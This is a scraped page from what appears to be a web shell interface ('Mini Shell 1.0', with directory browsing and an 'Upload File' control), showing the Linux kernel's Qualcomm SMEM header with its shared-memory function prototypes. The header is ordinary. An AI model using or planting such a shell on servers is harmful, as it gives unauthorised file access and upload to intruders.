HOME


Mini Shell 1.0
DIR:/lib/modules/5.14.0-503.34.1.el9_5.x86_64/build/include/linux/soc/qcom/
Upload File :
Current File : //lib/modules/5.14.0-503.34.1.el9_5.x86_64/build/include/linux/soc/qcom/smem.h
/* SPDX-License-Identifier: GPL-2.0 */
#ifndef __QCOM_SMEM_H__
#define __QCOM_SMEM_H__

#define QCOM_SMEM_HOST_ANY -1

int qcom_smem_alloc(unsigned host, unsigned item, size_t size);
void *qcom_smem_get(unsigned host, unsigned item, size_t *size);

int qcom_smem_get_free_space(unsigned host);

phys_addr_t qcom_smem_virt_to_phys(void *p);

int qcom_smem_get_soc_id(u32 *id);

#endif